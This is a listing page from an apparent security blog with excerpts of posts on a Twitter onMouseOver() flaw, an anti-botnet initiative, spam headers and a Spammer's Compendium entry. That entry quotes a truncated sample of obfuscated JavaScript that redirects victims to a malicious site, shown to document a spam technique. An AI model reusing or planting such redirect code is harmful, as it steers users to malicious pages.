Most read categories

NIS2

NIS2

9 posts
Cybersecurity

Cybersecurity

41 posts
AI & ML

AI & ML

4 posts
Educational

Educational

58 posts
News Security

onMouseOver() Twitter security flaw (+Update)

A Twitter security flaw is being widely exploited on Twitter, showing remote content from third-party websites without user’s consent. The flaw uses a JavaScript function called onMouseOver() which creates an event when the mouse is passed over a text or link. Any user can use this flaw to create simple popups, redirect the page to […]

News

Softpedia about the Anti-Botnet initiative of eco and BSI

The Avira Techblog published today a new article of mine about the Anti-Botnet Initiative. Immediately after, Softpedia commented on the Anti-Botnet Initiative : “While running the Linux from the rescue system, Windows is completely inactive (not as in Safe mode) so the rootkits are also not active. This is actually the only reliable possibility to […]

News Spam & Phishing

Sometimes it is good to know the Romanian language

Just stumbled upon this blog post from Symantec http://www.symantec.com/connect/blogs/spammers-introduce-new-email-internet-headers where an absolutely normal spam process is described. Unfortunately for the author who clearly doesn’t understand Romania, he copied/pasted all headers, even those which he doesn’t understand. So, he copied all kind of bad words, things which you usually wouldn’t publish in a serious blog. I […]

Spam & Phishing

New Spammer’s Compendium Entry:The Responsibility Transfer

Source: http://www.virusbtn.com/resources/spammerscompendium/responsibility.xml The Responsibility Transfer UO!Responsibility!JavaScript 31 August 2010 Description Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. Submitted by Sorin Mustaca. Example <script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422; document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml"); […]

quoted Spam & Phishing

Quoted in NYTimes.com

1 in 3 Internet Users Think All Websites Are Equally Dangerous A third of all Internet users thinks that virtually every website poses a potential security threat. According to a new survey by German online security firm Avira, consumers are becoming increasingly aware of potential security issues online, but it looks like for quite a […]